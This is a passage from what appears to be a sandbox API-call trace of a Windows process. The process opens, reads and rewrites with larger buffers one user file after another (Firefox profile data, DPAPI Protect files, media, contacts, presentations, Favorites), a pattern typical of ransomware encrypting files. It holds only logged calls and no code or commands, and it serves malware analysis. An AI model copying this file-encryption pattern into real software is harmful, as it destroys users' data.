lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5a0, lpOverlapped=0x0) returned 1 [0159.668] CloseHandle (hObject=0x1d8) returned 1 [0159.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0159.670] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.670] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4c [0159.670] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.670] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.670] ReleaseMutex (hMutex=0x168) returned 1 [0159.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SYNCHIST", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0159.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SYNCHIST", cchWideChar=8, lpMultiByteStr=0x1f735ac, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SYNCHIST", lpUsedDefaultChar=0x0) returned 8 [0159.670] ReadFile (in: hFile=0x1d8, lpBuffer=0x1fac5a8, nNumberOfBytesToRead=0x4c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fac5a8*, lpNumberOfBytesRead=0x2b1f2bc*=0x4c, lpOverlapped=0x0) returned 1 [0159.672] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0159.672] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5d4, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5d4, lpOverlapped=0x0) returned 1 [0159.672] CloseHandle (hObject=0x1d8) returned 1 [0159.672] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0159.962] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.962] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x501 [0159.962] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.962] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.963] ReleaseMutex (hMutex=0x168) returned 1 [0159.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="localstore.rdf", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0159.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="localstore.rdf", cchWideChar=14, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localstore.rdf", lpUsedDefaultChar=0x0) returned 14 [0159.963] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f3be08, nNumberOfBytesToRead=0x501, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3be08*, lpNumberOfBytesRead=0x2b1f2bc*=0x501, lpOverlapped=0x0) returned 1 [0159.965] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0159.965] WriteFile (in: hFile=0x1d8, lpBuffer=0x2878148*, nNumberOfBytesToWrite=0xa89, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2878148*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa89, lpOverlapped=0x0) returned 1 [0161.431] CloseHandle (hObject=0x1d8) returned 1 [0161.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pbNWJxM.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pbnwjxm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.431] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.431] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xbed7 [0161.432] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.432] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.432] ReleaseMutex (hMutex=0x168) returned 1 [0161.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pbNWJxM.wav", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pbNWJxM.wav", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pbNWJxM.wav", lpUsedDefaultChar=0x0) returned 11 [0161.432] ReadFile (in: hFile=0x1d8, lpBuffer=0x286da88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0161.433] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xaed7 [0161.433] ReadFile (in: hFile=0x1d8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.433] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xaed7 [0161.434] WriteFile (in: hFile=0x1d8, lpBuffer=0x28514c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28514c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.437] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0161.437] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0161.437] CloseHandle (hObject=0x1d8) returned 1 [0161.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YWYD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ywyd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.438] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.438] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x179dc [0161.438] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.439] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.439] ReleaseMutex (hMutex=0x168) returned 1 [0161.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YWYD.mp3", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0161.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YWYD.mp3", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YWYD.mp3", lpUsedDefaultChar=0x0) returned 8 [0161.439] ReadFile (in: hFile=0x1d8, lpBuffer=0x286da88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0161.443] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x169dc [0161.443] ReadFile (in: hFile=0x1d8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.444] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x169dc [0161.444] WriteFile (in: hFile=0x1d8, lpBuffer=0x28514c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28514c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.444] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0161.444] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0161.444] CloseHandle (hObject=0x1d8) returned 1 [0161.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.446] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.446] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x494 [0161.446] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.446] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.446] ReleaseMutex (hMutex=0x168) returned 1 [0161.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sikvnb huvuib.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0161.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sikvnb huvuib.contact", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sikvnb huvuib.contact", lpUsedDefaultChar=0x0) returned 21 [0161.446] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663858, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2b1f2bc*=0x494, lpOverlapped=0x0) returned 1 [0161.484] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0161.484] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa1c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa1c, lpOverlapped=0x0) returned 1 [0161.484] CloseHandle (hObject=0x1d8) returned 1 [0161.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\H9KhwMpayQi8MRv3xPa.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jlhpxbn7\\h9khwmpayqi8mrv3xpa.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.485] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.485] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x157b3 [0161.485] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.485] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.486] ReleaseMutex (hMutex=0x168) returned 1 [0161.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="H9KhwMpayQi8MRv3xPa.odp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0161.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="H9KhwMpayQi8MRv3xPa.odp", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="H9KhwMpayQi8MRv3xPa.odp", lpUsedDefaultChar=0x0) returned 23 [0161.486] ReadFile (in: hFile=0x1d8, lpBuffer=0x286da88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0161.487] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x147b3 [0161.487] ReadFile (in: hFile=0x1d8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.487] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x147b3 [0161.488] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.488] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0161.488] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0161.488] CloseHandle (hObject=0x1d8) returned 1 [0161.489] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qOTgB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qotgb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.489] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.489] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x147cd [0161.489] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.489] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.490] ReleaseMutex (hMutex=0x168) returned 1 [0161.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qOTgB.pptx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0161.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qOTgB.pptx", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qOTgB.pptx", lpUsedDefaultChar=0x0) returned 10 [0161.490] ReadFile (in: hFile=0x1d8, lpBuffer=0x286da88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0161.491] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x137cd [0161.491] ReadFile (in: hFile=0x1d8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.492] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x137cd [0161.492] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.492] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0161.492] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0161.492] CloseHandle (hObject=0x1d8) returned 1 [0161.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.493] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.493] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x192 [0161.493] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.493] ReleaseMutex (hMutex=0x168) returned 1 [0161.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0161.494] ReadFile (in: hFile=0x1d8, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2b1f2bc*=0x192, lpOverlapped=0x0) returned 1 [0161.494] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0161.495] WriteFile (in: hFile=0x1d8, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x71a, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x2b1f2d0*=0x71a, lpOverlapped=0x0) returned 1 [0161.495] CloseHandle (hObject=0x1d8) returned 1 [0161.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.508] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x86 [0161.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.509] ReleaseMutex (hMutex=0x168) returned 1 [0161.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Store.url", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0161.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Store.url", cchWideChar=19, lpMultiByteStr=0x1f88d34, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Store.url", lpUsedDefaultChar=0x0) returned 19 [0161.509] ReadFile (in: hFile=0x1d8, lpBuffer=0x2673210, nNumberOfBytesToRead=0x86, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673210*, lpNumberOfBytesRead=0x2b1f2bc*=0x86, lpOverlapped=0x0) returned 1 [0161.510] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0161.511] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x60e, 